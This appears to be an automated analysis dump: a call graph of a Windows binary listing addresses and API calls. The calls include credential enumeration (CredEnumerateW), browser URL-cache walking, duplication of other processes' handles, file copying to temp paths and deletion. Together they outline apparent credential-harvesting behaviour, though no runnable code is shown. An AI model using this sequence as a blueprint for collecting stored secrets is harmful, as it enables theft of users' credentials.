38739 40969c LoadCursorW SetCursor 38602->38739 38604 411143 38740 4032b4 38604->38740 38758 444a54 38604->38758 38605 4110f7 _wcsicmp 38605->38607 38606 411157 38608 40ada2 _wcsicmp 38606->38608 38607->38602 38607->38605 38761 410c46 10 API calls 38607->38761 38611 411167 38608->38611 38609 4111af 38611->38609 38612 4111a6 qsort 38611->38612 38612->38609 38615->38412 38617 40eb10 38616->38617 38629 40e8e0 38617->38629 38620 40eb6c memcpy memcpy 38624 40ebb7 38620->38624 38621 40ebf2 ??2@YAPAXI ??2@YAPAXI 38623 40ec2e ??2@YAPAXI 38621->38623 38626 40ec65 38621->38626 38622 40d134 16 API calls 38622->38624 38623->38626 38624->38620 38624->38621 38624->38622 38626->38626 38639 40ea7f 38626->38639 38628 402f49 38628->38412 38630 40e8f2 38629->38630 38631 40e8eb ??3@YAXPAX 38629->38631 38632 40e900 38630->38632 38633 40e8f9 ??3@YAXPAX 38630->38633 38631->38630 38634 40e911 38632->38634 38635 40e90a ??3@YAXPAX 38632->38635 38633->38632 38636 40e931 ??2@YAPAXI ??2@YAPAXI 38634->38636 38637 40e921 ??3@YAXPAX 38634->38637 38638 40e92a ??3@YAXPAX 38634->38638 38635->38634 38636->38620 38637->38638 38638->38636 38640 40aa04 ??3@YAXPAX 38639->38640 38641 40ea88 38640->38641 38642 40aa04 ??3@YAXPAX 38641->38642 38643 40ea90 38642->38643 38644 40aa04 ??3@YAXPAX 38643->38644 38645 40ea98 38644->38645 38646 40aa04 ??3@YAXPAX 38645->38646 38647 40eaa0 38646->38647 38648 40a9ce 4 API calls 38647->38648 38649 40eab3 38648->38649 38650 40a9ce 4 API calls 38649->38650 38651 40eabd 38650->38651 38652 40a9ce 4 API calls 38651->38652 38653 40eac7 38652->38653 38654 40a9ce 4 API calls 38653->38654 38655 40ead1 38654->38655 38655->38628 38656->38588 38657->38592 38715 40b2cc 38658->38715 38660 402b0a 38661 40b2cc 27 API calls 38660->38661 38662 402b23 38661->38662 38663 40b2cc 27 API calls 38662->38663 38664 402b3a 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 402b54 38665->38666 38667 40b2cc 27 API calls 38666->38667 38668 402b6b 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 402b82 38669->38670 38671 40b2cc 27 API calls 38670->38671 38672 402b99 38671->38672 38673 40b2cc 27 API calls 38672->38673 38674 402bb0 38673->38674 38675 40b2cc 27 API calls 38674->38675 38676 402bc7 38675->38676 38677 40b2cc 27 API calls 38676->38677 38678 402bde 38677->38678 38679 40b2cc 27 API calls 38678->38679 38680 402bf5 38679->38680 38681 40b2cc 27 API calls 38680->38681 38682 402c0c 38681->38682 38683 40b2cc 27 API calls 38682->38683 38684 402c23 38683->38684 38685 40b2cc 27 API calls 38684->38685 38686 402c3a 38685->38686 38687 40b2cc 27 API calls 38686->38687 38688 402c51 38687->38688 38689 40b2cc 27 API calls 38688->38689 38690 402c68 38689->38690 38691 40b2cc 27 API calls 38690->38691 38692 402c7f 38691->38692 38693 40b2cc 27 API calls 38692->38693 38694 402c99 38693->38694 38695 40b2cc 27 API calls 38694->38695 38696 402cb3 38695->38696 38697 40b2cc 27 API calls 38696->38697 38698 402cd5 38697->38698 38699 40b2cc 27 API calls 38698->38699 38700 402cf0 38699->38700 38701 40b2cc 27 API calls 38700->38701 38702 402d0b 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 402d26 38703->38704 38705 40b2cc 27 API calls 38704->38705 38706 402d3e 38705->38706 38707 40b2cc 27 API calls 38706->38707 38708 402d59 38707->38708 38709 40b2cc 27 API calls 38708->38709 38710 402d78 38709->38710 38711 40b2cc 27 API calls 38710->38711 38712 402d93 38711->38712 38713 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38712->38713 38713->38596 38714->38586 38718 40b58d 38715->38718 38717 40b2d1 38717->38660 38719 40b5a4 GetModuleHandleW FindResourceW 38718->38719 38720 40b62e 38718->38720 38721 40b5c2 LoadResource 38719->38721 38723 40b5e7 38719->38723 38720->38717 38722 40b5d0 SizeofResource LockResource 38721->38722 38721->38723 38722->38723 38723->38720 38731 40afcf 38723->38731 38725 40b608 memcpy 38734 40b4d3 memcpy 38725->38734 38727 40b61e 38735 40b3c1 18 API calls 38727->38735 38729 40b626 38736 40b04b 38729->38736 38732 40b04b ??3@YAXPAX 38731->38732 38733 40afd7 ??2@YAPAXI 38732->38733 38733->38725 38734->38727 38735->38729 38737 40b051 ??3@YAXPAX 38736->38737 38738 40b05f 38736->38738 38737->38738 38738->38720 38739->38604 38741 4032c4 38740->38741 38742 40b633 ??3@YAXPAX 38741->38742 38743 403316 38742->38743 38762 44553b 38743->38762 38747 403480 38958 40368c 15 API calls 38747->38958 38749 403489 38750 40b633 ??3@YAXPAX 38749->38750 38751 403495 38750->38751 38751->38606 38752 4033a9 memset memcpy 38753 4033ec wcscmp 38752->38753 38754 40333c 38752->38754 38753->38754 38754->38747 38754->38752 38754->38753 38956 4028e7 11 API calls 38754->38956 38957 40f508 6 API calls 38754->38957 38756 403421 _wcsicmp 38756->38754 38759 444a64 FreeLibrary 38758->38759 38760 444a83 38758->38760 38759->38760 38760->38606 38761->38607 38763 445548 38762->38763 38764 445599 38763->38764 38959 40c768 38763->38959 38765 4455a8 memset 38764->38765 38906 4457f2 38764->38906 39042 403988 38765->39042 38772 445854 38773 4458aa 38772->38773 39167 403c9c memset memset memset memset memset 38772->39167 38775 44594a 38773->38775 38776 4458bb memset memset 38773->38776 38774 445672 39053 403fbe memset memset memset memset memset 38774->39053 38778 4459ed 38775->38778 38779 44595e memset memset 38775->38779 38781 414c2e 16 API calls 38776->38781 38783 445a00 memset memset 38778->38783 38784 445b22 38778->38784 38785 414c2e 16 API calls 38779->38785 38780 4455e5 38780->38774 38797 44560f 38780->38797 38786 4458f9 38781->38786 39190 414c2e 38783->39190 38789 445bca 38784->38789 38790 445b38 memset memset memset 38784->38790 38795 44599c 38785->38795 38796 40b2cc 27 API calls 38786->38796 38806 445c8b memset memset 38789->38806 38856 445cf0 38789->38856 38801 445bd4 38790->38801 38802 445b98 38790->38802 38791 445849 39254 40b1ab ??3@YAXPAX ??3@YAXPAX 38791->39254 38805 40b2cc 27 API calls 38795->38805 38807 445909 38796->38807 38798 4087b3 338 API calls 38797->38798 38817 445621 38798->38817 38800 44589f 39255 40b1ab ??3@YAXPAX ??3@YAXPAX 38800->39255 38814 414c2e 16 API calls 38801->38814 38802->38801 38810 445ba2 38802->38810 38819 4459ac 38805->38819 38808 414c2e 16 API calls 38806->38808 38816 409d1f 6 API calls 38807->38816 38820 445cc9 38808->38820 39327 4099c6 wcslen 38810->39327 38811 4456b2 39242 40b1ab ??3@YAXPAX ??3@YAXPAX 38811->39242 38813 40b2cc 27 API calls 38823 445a4f 38813->38823 38825 445be2 38814->38825 38815 403335 38955 4452e5 45 API calls 38815->38955 38828 445919 38816->38828 39240 4454bf 20 API calls 38817->39240 38818 445823 38818->38791 38836 4087b3 338 API calls 38818->38836 38829 409d1f 6 API calls 38819->38829 38830 409d1f 6 API calls 38820->38830 38821 445879 38821->38800 38840 4087b3 338 API calls 38821->38840 39205 409d1f wcslen wcslen 38823->39205 38834 40b2cc 27 API calls 38825->38834 38826 445d3d 38854 40b2cc 27 API calls 38826->38854 38827 445d88 memset memset memset 38837 414c2e 16 API calls 38827->38837 39256 409b98 GetFileAttributesW 38828->39256 38838 4459bc 38829->38838 38839 445ce1 38830->38839 38831 445bb3 39330 445403 memset 38831->39330 38832 445680 38832->38811 39076 4087b3 memset 38832->39076 38843 445bf3 38834->38843 38836->38818 38846 445dde 38837->38846 39323 409b98 GetFileAttributesW 38838->39323 39347 409b98 GetFileAttributesW 38839->39347 38840->38821 38853 409d1f 6 API calls 38843->38853 38844 445928 38844->38775 39257 40b6ef 38844->39257 38855 40b2cc 27 API calls 38846->38855 38848 4459cb 38848->38778 38865 40b6ef 252 API calls 38848->38865 38852 40b2cc 27 API calls 38858 445a94 38852->38858 38860 445c07 38853->38860 38861 445d54 _wcsicmp 38854->38861 38864 445def 38855->38864 38856->38815 38856->38826 38856->38827 38857 445389 258 API calls 38857->38789 39210 40ae18 38858->39210 38859 44566d 38859->38906 39127 413d4c 38859->39127 38868 445389 258 API calls 38860->38868 38869 445d71 38861->38869 38932 445d67 38861->38932 38863 445665 39241 40b1ab ??3@YAXPAX ??3@YAXPAX 38863->39241 38870 409d1f 6 API calls 38864->38870 38865->38778 38873 445c17 38868->38873 39348 445093 23 API calls 38869->39348 38876 445e03 38870->38876 38872 4456d8 38878 40b2cc 27 API calls 38872->38878 38879 40b2cc 27 API calls 38873->38879 38875 44563c 38875->38863 38881 4087b3 338 API calls 38875->38881 39349 409b98 GetFileAttributesW 38876->39349 38877 40b6ef 252 API calls 38877->38815 38883 4456e2 38878->38883 38884 445c23 38879->38884 38880 445d83 38880->38815 38881->38875 39243 413fa6 _wcsicmp _wcsicmp 38883->39243 38888 409d1f 6 API calls 38884->38888 38886 445e12 38889 445e6b 38886->38889 38893 40b2cc 27 API calls 38886->38893 38891 445c37 38888->38891 39351 445093 23 API calls 38889->39351 38890 4456eb 38896 4456fd memset memset memset memset 38890->38896 38897 4457ea 38890->38897 38898 445389 258 API calls 38891->38898 38892 445b17 39324 40aebe 38892->39324 38900 445e33 38893->38900 39244 409c70 wcscpy wcsrchr 38896->39244 39247 413d29 38897->39247 38904 445c47 38898->38904 38905 409d1f 6 API calls 38900->38905 38902 445e7e 38907 445f67 38902->38907 38910 40b2cc 27 API calls 38904->38910 38911 445e47 38905->38911 38906->38772 39144 403e2d memset memset memset memset memset 38906->39144 38912 40b2cc 27 API calls 38907->38912 38908 445ab2 memset 38913 40b2cc 27 API calls 38908->38913 38915 445c53 38910->38915 39350 409b98 GetFileAttributesW 38911->39350 38917 445f73 38912->38917 38918 445aa1 38913->38918 38914 409c70 2 API calls 38919 44577e 38914->38919 38920 409d1f 6 API calls 38915->38920 38922 409d1f 6 API calls 38917->38922 38918->38892 38918->38908 38923 409d1f 6 API calls 38918->38923 39217 40add4 38918->39217 39222 445389 38918->39222 39231 40ae51 38918->39231 38924 409c70 2 API calls 38919->38924 38925 445c67 38920->38925 38921 445e56 38921->38889 38929 445e83 memset 38921->38929 38926 445f87 38922->38926 38923->38918 38927 44578d 38924->38927 38928 445389 258 API calls 38925->38928 39354 409b98 GetFileAttributesW 38926->39354 38927->38897 38934 40b2cc 27 API calls 38927->38934 38928->38789 38933 40b2cc 27 API calls 38929->38933 38932->38815 38932->38877 38935 445eab 38933->38935 38936 4457a8 38934->38936 38937 409d1f 6 API calls 38935->38937 38938 409d1f 6 API calls 38936->38938 38940 445ebf 38937->38940 38939 4457b8 38938->38939 39246 409b98 GetFileAttributesW 38939->39246 38942 40ae18 9 API calls 38940->38942 38946 445ef5 38942->38946 38943 4457c7 38943->38897 38945 4087b3 338 API calls 38943->38945 38944 40ae51 9 API calls 38944->38946 38945->38897 38946->38944 38947 445f5c 38946->38947 38949 40add4 2 API calls 38946->38949 38950 40b2cc 27 API calls 38946->38950 38951 409d1f 6 API calls 38946->38951 38953 445f3a 38946->38953 39352 409b98 GetFileAttributesW 38946->39352 38948 40aebe FindClose 38947->38948 38948->38907 38949->38946 38950->38946 38951->38946 39353 445093 23 API calls 38953->39353 38955->38754 38956->38756 38957->38754 38958->38749 38960 40c775 38959->38960 39355 40b1ab ??3@YAXPAX ??3@YAXPAX 38960->39355 38962 40c788 39356 40b1ab ??3@YAXPAX ??3@YAXPAX 38962->39356 38964 40c790 39357 40b1ab ??3@YAXPAX ??3@YAXPAX 38964->39357 38966 40c798 38967 40aa04 ??3@YAXPAX 38966->38967 38968 40c7a0 38967->38968 39358 40c274 memset 38968->39358 38973 40a8ab 9 API calls 38974 40c7c3 38973->38974 38975 40a8ab 9 API calls 38974->38975 38976 40c7d0 38975->38976 39387 40c3c3 38976->39387 38980 40c877 38989 40bdb0 38980->38989 38981 40c86c 39429 4053fe 39 API calls 38981->39429 38987 40c7e5 38987->38980 38987->38981 38988 40c634 49 API calls 38987->38988 39412 40a706 38987->39412 38988->38987 39597 404363 38989->39597 38992 40bf5d 39617 40440c 38992->39617 38994 40bdee 38994->38992 38997 40b2cc 27 API calls 38994->38997 38995 40bddf CredEnumerateW 38995->38994 38998 40be02 wcslen 38997->38998 38998->38992 39005 40be1e 38998->39005 38999 40be26 _wcsncoll 38999->39005 39002 40be7d memset 39003 40bea7 memcpy 39002->39003 39002->39005 39004 40bf11 wcschr 39003->39004 39003->39005 39004->39005 39005->38992 39005->38999 39005->39002 39005->39003 39005->39004 39006 40b2cc 27 API calls 39005->39006 39008 40bf43 LocalFree 39005->39008 39620 40bd5d 28 API calls 39005->39620 39621 404423 39005->39621 39007 40bef6 _wcsnicmp 39006->39007 39007->39004 39007->39005 39008->39005 39009 4135f7 39634 4135e0 39009->39634 39012 40b2cc 27 API calls 39013 41360d 39012->39013 39014 40a804 8 API calls 39013->39014 39015 413613 39014->39015 39043 40399d 39042->39043 39663 403a16 39043->39663 39046 403a12 wcsrchr 39046->38780 39049 4039a3 39050 4039f4 39049->39050 39052 403a09 39049->39052 39674 40a02c CreateFileW 39049->39674 39051 4099c6 2 API calls 39050->39051 39050->39052 39051->39052 39677 40b1ab ??3@YAXPAX ??3@YAXPAX 39052->39677 39054 414c2e 16 API calls 39053->39054 39055 404048 39054->39055 39056 414c2e 16 API calls 39055->39056 39057 404056 39056->39057 39058 409d1f 6 API calls 39057->39058 39059 404073 39058->39059 39060 409d1f 6 API calls 39059->39060 39061 40408e 39060->39061 39062 409d1f 6 API calls 39061->39062 39063 4040a6 39062->39063 39064 403af5 20 API calls 39063->39064 39065 4040ba 39064->39065 39066 403af5 20 API calls 39065->39066 39067 4040cb 39066->39067 39704 40414f memset 39067->39704 39069 404140 39718 40b1ab ??3@YAXPAX ??3@YAXPAX 39069->39718 39070 4040ec memset 39074 4040e0 39070->39074 39072 404148 39072->38832 39073 4099c6 2 API calls 39073->39074 39074->39069 39074->39070 39074->39073 39075 40a8ab 9 API calls 39074->39075 39075->39074 39731 40a6e6 WideCharToMultiByte 39076->39731 39078 4087ed 39732 4095d9 memset 39078->39732 39128 40b633 ??3@YAXPAX 39127->39128 39129 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39128->39129 39130 413f00 Process32NextW 39129->39130 39131 413da5 OpenProcess 39130->39131 39132 413f17 CloseHandle 39130->39132 39133 413eb0 39131->39133 39134 413df3 memset 39131->39134 39132->38872 39133->39130 39136 413ebf ??3@YAXPAX 39133->39136 39137 4099f4 3 API calls 39133->39137 39970 413f27 39134->39970 39136->39133 39137->39133 39139 413e37 GetModuleHandleW 39140 413e46 GetProcAddress 39139->39140 39141 413e1f 39139->39141 39140->39141 39141->39139 39975 413959 39141->39975 39991 413ca4 39141->39991 39143 413ea2 CloseHandle 39143->39133 39145 414c2e 16 API calls 39144->39145 39146 403eb7 39145->39146 39147 414c2e 16 API calls 39146->39147 39148 403ec5 39147->39148 39149 409d1f 6 API calls 39148->39149 39150 403ee2 39149->39150 39151 409d1f 6 API calls 39150->39151 39152 403efd 39151->39152 39153 409d1f 6 API calls 39152->39153 39154 403f15 39153->39154 39155 403af5 20 API calls 39154->39155 39156 403f29 39155->39156 39157 403af5 20 API calls 39156->39157 39158 403f3a 39157->39158 39159 40414f 33 API calls 39158->39159 39165 403f4f 39159->39165 39160 403faf 40005 40b1ab ??3@YAXPAX ??3@YAXPAX 39160->40005 39162 403f5b memset 39162->39165 39163 403fb7 39163->38818 39164 4099c6 2 API calls 39164->39165 39165->39160 39165->39162 39165->39164 39166 40a8ab 9 API calls 39165->39166 39166->39165 39168 414c2e 16 API calls 39167->39168 39169 403d26 39168->39169 39170 414c2e 16 API calls 39169->39170 39171 403d34 39170->39171 39172 409d1f 6 API calls 39171->39172 39173 403d51 39172->39173 39174 409d1f 6 API calls 39173->39174 39175 403d6c 39174->39175 39176 409d1f 6 API calls 39175->39176 39177 403d84 39176->39177 39178 403af5 20 API calls 39177->39178 39179 403d98 39178->39179 39180 403af5 20 API calls 39179->39180 39181 403da9 39180->39181 39182 40414f 33 API calls 39181->39182 39188 403dbe 39182->39188 39183 403e1e 40006 40b1ab ??3@YAXPAX ??3@YAXPAX 39183->40006 39184 403dca memset 39184->39188 39186 403e26 39186->38821 39187 4099c6 2 API calls 39187->39188 39188->39183 39188->39184 39188->39187 39189 40a8ab 9 API calls 39188->39189 39189->39188 39191 414b81 9 API calls 39190->39191 39192 414c40 39191->39192 39193 414c73 memset 39192->39193 40007 409cea 39192->40007 39196 414c94 39193->39196 39195 414c64 39195->38813 40010 414592 RegOpenKeyExW 39196->40010 39199 414cc1 39200 414cf4 wcscpy 39199->39200 40011 414bb0 wcscpy 39199->40011 39200->39195 39202 414cd2 40012 4145ac RegQueryValueExW 39202->40012 39204 414ce9 RegCloseKey 39204->39200 39206 409d62 39205->39206 39207 409d43 wcscpy 39205->39207 39206->38852 39208 409719 2 API calls 39207->39208 39209 409d51 wcscat 39208->39209 39209->39206 39211 40aebe FindClose 39210->39211 39212 40ae21 39211->39212 39213 4099c6 2 API calls 39212->39213 39214 40ae35 39213->39214 39215 409d1f 6 API calls 39214->39215 39216 40ae49 39215->39216 39216->38918 39218 40ade0 39217->39218 39219 40ae0f 39217->39219 39218->39219 39220 40ade7 wcscmp 39218->39220 39219->38918 39220->39219 39221 40adfe wcscmp 39220->39221 39221->39219 39223 40ae18 9 API calls 39222->39223 39229 4453c4 39223->39229 39224 40ae51 9 API calls 39224->39229 39225 4453f3 39226 40aebe FindClose 39225->39226 39228 4453fe 39226->39228 39227 40add4 2 API calls 39227->39229 39228->38918 39229->39224 39229->39225 39229->39227 39230 445403 253 API calls 39229->39230 39230->39229 39232 40ae7b FindNextFileW 39231->39232 39233 40ae5c FindFirstFileW 39231->39233 39234 40ae94 39232->39234 39235 40ae8f 39232->39235 39233->39234 39237 40aeb6 39234->39237 39238 409d1f 6 API calls 39234->39238 39236 40aebe FindClose 39235->39236 39236->39234 39237->38918 39238->39237 39240->38875 39241->38859 39242->38859 39243->38890 39245 409c89 39244->39245 39245->38914 39246->38943 39248 413d39 39247->39248 39249 413d2f FreeLibrary 39247->39249 39250 40b633 ??3@YAXPAX 39248->39250 39249->39248 39251 413d42 39250->39251 39252 40b633 ??3@YAXPAX 39251->39252 39253 413d4a 39252->39253 39253->38906 39254->38772 39255->38773 39256->38844 39258 44db70 39257->39258 39259 40b6fc memset 39258->39259 39260 409c70 2 API calls 39259->39260 39261 40b732 wcsrchr 39260->39261 39262 40b743 39261->39262 39263 40b746 memset 39261->39263 39262->39263 39264 40b2cc 27 API calls 39263->39264 39265 40b76f 39264->39265 39266 409d1f 6 API calls 39265->39266 39267 40b783 39266->39267 40013 409b98 GetFileAttributesW 39267->40013 39269 40b792 39270 409c70 2 API calls 39269->39270 39284 40b7c2 39269->39284 39272 40b7a5 39270->39272 39274 40b2cc 27 API calls 39272->39274 39279 40b7b2 39274->39279 39275 40b837 FindCloseChangeNotification 39278 40b83e memset 39275->39278 39276 40b817 40048 409a45 GetTempPathW 39276->40048 40047 40a6e6 WideCharToMultiByte 39278->40047 39282 409d1f 6 API calls 39279->39282 39280 40b827 CopyFileW 39280->39278 39282->39284 39283 40b866 39285 444432 121 API calls 39283->39285 40014 40bb98 39284->40014 39286 40b879 39285->39286 39287 40bad5 39286->39287 39288 40b273 27 API calls 39286->39288 39289 40baeb 39287->39289 39290 40bade DeleteFileW 39287->39290 39291 40b89a 39288->39291 39292 40b04b ??3@YAXPAX 39289->39292 39290->39289 39293 438552 134 API calls 39291->39293 39294 40baf3 39292->39294 39295 40b8a4 39293->39295 39294->38775 39296 40bacd 39295->39296 39298 4251c4 137 API calls 39295->39298 39297 443d90 111 API calls 39296->39297 39297->39287 39321 40b8b8 39298->39321 39299 40bac6 40060 424f26 123 API calls 39299->40060 39300 40b8bd memset 40051 425413 17 API calls 39300->40051 39303 425413 17 API calls 39303->39321 39306 40a71b MultiByteToWideChar 39306->39321 39307 40a734 MultiByteToWideChar 39307->39321 39310 40b9b5 memcmp 39310->39321 39311 4099c6 2 API calls 39311->39321 39312 404423 37 API calls 39312->39321 39315 4251c4 137 API calls 39315->39321 39316 40bb3e memset memcpy 40061 40a734 MultiByteToWideChar 39316->40061 39318 40bb88 LocalFree 39318->39321 39321->39299 39321->39300 39321->39303 39321->39306 39321->39307 39321->39310 39321->39311 39321->39312 39321->39315 39321->39316 39322 40ba5f memcmp 39321->39322 40052 4253ef 16 API calls 39321->40052 40053 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39321->40053 40054 4253af 17 API calls 39321->40054 40055 4253cf 17 API calls 39321->40055 40056 447280 memset 39321->40056 40057 447960 memset memcpy memcpy memcpy 39321->40057 40058 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39321->40058 40059 447920 memcpy memcpy memcpy 39321->40059 39322->39321 39323->38848 39325 40aed1 39324->39325 39326 40aec7 FindClose 39324->39326 39325->38784 39326->39325 39328 4099d7 39327->39328 39329 4099da memcpy 39327->39329 39328->39329 39329->38831 39331 40b2cc 27 API calls 39330->39331 39332 44543f 39331->39332 39333 409d1f 6 API calls 39332->39333 39334 44544f 39333->39334 40148 409b98 GetFileAttributesW 39334->40148 39336 445476 39339 40b2cc 27 API calls 39336->39339 39337 44545e 39337->39336 39338 40b6ef 252 API calls 39337->39338 39338->39336 39340 445482 39339->39340 39341 409d1f 6 API calls 39340->39341 39342 445492 39341->39342 40149 409b98 GetFileAttributesW 39342->40149 39344 4454a1 39345 4454b9 39344->39345 39346 40b6ef 252 API calls 39344->39346 39345->38857 39346->39345 39347->38856 39348->38880 39349->38886 39350->38921 39351->38902 39352->38946 39353->38946 39354->38932 39355->38962 39356->38964 39357->38966 39359 414c2e 16 API calls 39358->39359 39360 40c2ae 39359->39360 39430 40c1d3 39360->39430 39365 40c3be 39382 40a8ab 39365->39382 39366 40afcf 2 API calls 39367 40c2fd FindFirstUrlCacheEntryW 39366->39367 39368 40c3b6 39367->39368 39369 40c31e wcschr 39367->39369 39370 40b04b ??3@YAXPAX 39368->39370 39371 40c331 39369->39371 39372 40c35e FindNextUrlCacheEntryW 39369->39372 39370->39365 39373 40a8ab 9 API calls 39371->39373 39372->39369 39374 40c373 GetLastError 39372->39374 39377 40c33e wcschr 39373->39377 39375 40c3ad FindCloseUrlCache 39374->39375 39376 40c37e 39374->39376 39375->39368 39378 40afcf 2 API calls 39376->39378 39377->39372 39379 40c34f 39377->39379 39380 40c391 FindNextUrlCacheEntryW 39378->39380 39381 40a8ab 9 API calls 39379->39381 39380->39369 39380->39375 39381->39372 39524 40a97a 39382->39524 39385 40a8cc 39385->38973 39386 40a8d0 7 API calls 39386->39385 39529 40b1ab ??3@YAXPAX ??3@YAXPAX 39387->39529 39389 40c3dd 39390 40b2cc 27 API calls 39389->39390 39391 40c3e7 39390->39391 39530 414592 RegOpenKeyExW 39391->39530 39393 40c3f4 39394 40c50e 39393->39394 39395 40c3ff 39393->39395 39409 405337 39394->39409 39396 40a9ce 4 API calls 39395->39396 39397 40c418 memset 39396->39397 39531 40aa1d 39397->39531 39400 40c471 39402 40c47a _wcsupr 39400->39402 39401 40c505 RegCloseKey 39401->39394 39403 40a8d0 7 API calls 39402->39403 39404 40c498 39403->39404 39405 40a8d0 7 API calls 39404->39405 39406 40c4ac memset 39405->39406 39407 40aa1d 39406->39407 39408 40c4e4 RegEnumValueW 39407->39408 39408->39401 39408->39402 39533 405220 39409->39533 39413 4099c6 2 API calls 39412->39413 39414 40a714 _wcslwr 39413->39414 39415 40c634 39414->39415 39590 405361 39415->39590 39418 40c65c wcslen 39593 4053b6 39 API calls 39418->39593 39419 40c71d wcslen 39419->38987 39421 40c677 39422 40c713 39421->39422 39594 40538b 39 API calls 39421->39594 39596 4053df 39 API calls 39422->39596 39425 40c6a5 39425->39422 39426 40c6a9 memset 39425->39426 39427 40c6d3 39426->39427 39595 40c589 43 API calls 39427->39595 39429->38980 39431 40ae18 9 API calls 39430->39431 39437 40c210 39431->39437 39432 40ae51 9 API calls 39432->39437 39433 40c264 39434 40aebe FindClose 39433->39434 39436 40c26f 39434->39436 39435 40add4 2 API calls 39435->39437 39442 40e5ed memset memset 39436->39442 39437->39432 39437->39433 39437->39435 39438 40c231 _wcsicmp 39437->39438 39439 40c1d3 35 API calls 39437->39439 39438->39437 39440 40c248 39438->39440 39439->39437 39455 40c084 22 API calls 39440->39455 39443 414c2e 16 API calls 39442->39443 39444 40e63f 39443->39444 39445 409d1f 6 API calls 39444->39445 39446 40e658 39445->39446 39456 409b98 GetFileAttributesW 39446->39456 39448 40e667 39449 40e680 39448->39449 39450 409d1f 6 API calls 39448->39450 39457 409b98 GetFileAttributesW 39449->39457 39450->39449 39452 40e68f 39454 40c2d8 39452->39454 39458 40e4b2 39452->39458 39454->39365 39454->39366 39455->39437 39456->39448 39457->39452 39479 40e01e 39458->39479 39460 40e593 39461 40e5b0 39460->39461 39462 40e59c DeleteFileW 39460->39462 39464 40b04b ??3@YAXPAX 39461->39464 39462->39461 39463 40e521 39463->39460 39502 40e175 39463->39502 39465 40e5bb 39464->39465 39467 40e5c4 CloseHandle 39465->39467 39468 40e5cc 39465->39468 39467->39468 39470 40b633 ??3@YAXPAX 39468->39470 39469 40e573 39472 40e584 39469->39472 39473 40e57c FindCloseChangeNotification 39469->39473 39471 40e5db 39470->39471 39475 40b633 ??3@YAXPAX 39471->39475 39523 40b1ab ??3@YAXPAX ??3@YAXPAX 39472->39523 39473->39472 39474 40e540 39474->39469 39522 40e2ab 30 API calls 39474->39522 39477 40e5e3 39475->39477 39477->39454 39480 406214 22 API calls 39479->39480 39481 40e03c 39480->39481 39482 40e16b 39481->39482 39483 40dd85 74 API calls 39481->39483 39482->39463 39484 40e06b 39483->39484 39484->39482 39485 40afcf ??2@YAPAXI ??3@YAXPAX 39484->39485 39486 40e08d OpenProcess 39485->39486 39487 40e0a4 GetCurrentProcess DuplicateHandle 39486->39487 39491 40e152 39486->39491 39488 40e0d0 GetFileSize 39487->39488 39489 40e14a CloseHandle 39487->39489 39492 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39488->39492 39489->39491 39490 40e160 39494 40b04b ??3@YAXPAX 39490->39494 39491->39490 39493 406214 22 API calls 39491->39493 39495 40e0ea 39492->39495 39493->39490 39494->39482 39496 4096dc CreateFileW 39495->39496 39497 40e0f1 CreateFileMappingW 39496->39497 39498 40e140 CloseHandle CloseHandle 39497->39498 39499 40e10b MapViewOfFile 39497->39499 39498->39489 39500 40e13b FindCloseChangeNotification 39499->39500 39501 40e11f WriteFile UnmapViewOfFile 39499->39501 39500->39498 39501->39500 39503 40e18c 39502->39503 39504 406b90 11 API calls 39503->39504 39505 40e19f 39504->39505 39506 40e1a7 memset 39505->39506 39507 40e299 39505->39507 39512 40e1e8 39506->39512 39508 4069a3 ??3@YAXPAX ??3@YAXPAX 39507->39508 39509 40e2a4 39508->39509 39509->39474 39510 406e8f 13 API calls 39510->39512 39511 406b53 SetFilePointerEx ReadFile 39511->39512 39512->39510 39512->39511 39513 40e283 39512->39513 39514 40dd50 _wcsicmp 39512->39514 39518 40742e 8 API calls 39512->39518 39519 40aae3 wcslen wcslen _memicmp 39512->39519 39520 40e244 _snwprintf 39512->39520 39515 40e291 39513->39515 39516 40e288 ??3@YAXPAX 39513->39516 39514->39512 39517 40aa04 ??3@YAXPAX 39515->39517 39516->39515 39517->39507 39518->39512 39519->39512 39521 40a8d0 7 API calls 39520->39521 39521->39512 39522->39474 39523->39460 39526 40a980 39524->39526 39525 40a8bb 39525->39385 39525->39386 39526->39525 39527 40a995 _wcsicmp 39526->39527 39528 40a99c wcscmp 39526->39528 39527->39526 39528->39526 39529->39389 39530->39393 39532 40aa23 RegEnumValueW 39531->39532 39532->39400 39532->39401 39534 405335 39533->39534 39535 40522a 39533->39535 39534->38987 39536 40b2cc 27 API calls 39535->39536 39537 405234 39536->39537 39538 40a804 8 API calls 39537->39538 39539 40523a 39538->39539 39578 40b273 39539->39578 39541 405248 _mbscpy _mbscat GetProcAddress 39542 40b273 27 API calls 39541->39542 39543 405279 39542->39543 39581 405211 GetProcAddress 39543->39581 39545 405282 39546 40b273 27 API calls 39545->39546 39547 40528f 39546->39547 39582 405211 GetProcAddress 39547->39582 39549 405298 39550 40b273 27 API calls 39549->39550 39551 4052a5 39550->39551 39579 40b58d 27 API calls 39578->39579 39580 40b18c 39579->39580 39580->39541 39581->39545 39582->39549 39591 405220 39 API calls 39590->39591 39592 405369 39591->39592 39592->39418 39592->39419 39593->39421 39594->39425 39595->39422 39596->39419 39598 40440c FreeLibrary 39597->39598 39599 40436d 39598->39599 39600 40a804 8 API calls 39599->39600 39601 404377 39600->39601 39602 404383 39601->39602 39603 404405 39601->39603 39604 40b273 27 API calls 39602->39604 39603->38992 39603->38994 39603->38995 39605 40438d GetProcAddress 39604->39605 39606 40b273 27 API calls 39605->39606 39607 4043a7 GetProcAddress 39606->39607 39608 40b273 27 API calls 39607->39608 39609 4043ba GetProcAddress 39608->39609 39610 40b273 27 API calls 39609->39610 39611 4043ce GetProcAddress 39610->39611 39612 40b273 27 API calls 39611->39612 39613 4043e2 GetProcAddress 39612->39613 39618 404413 FreeLibrary 39617->39618 39619 40441e 39617->39619 39618->39619 39619->39009 39620->39005 39622 40442e 39621->39622 39624 40447e 39621->39624 39623 40b2cc 27 API calls 39622->39623 39625 404438 39623->39625 39624->39005 39626 40a804 8 API calls 39625->39626 39627 40443e 39626->39627 39635 4135f6 39634->39635 39636 4135eb FreeLibrary 39634->39636 39635->39012 39636->39635 39664 403a29 39663->39664 39678 403bed memset memset 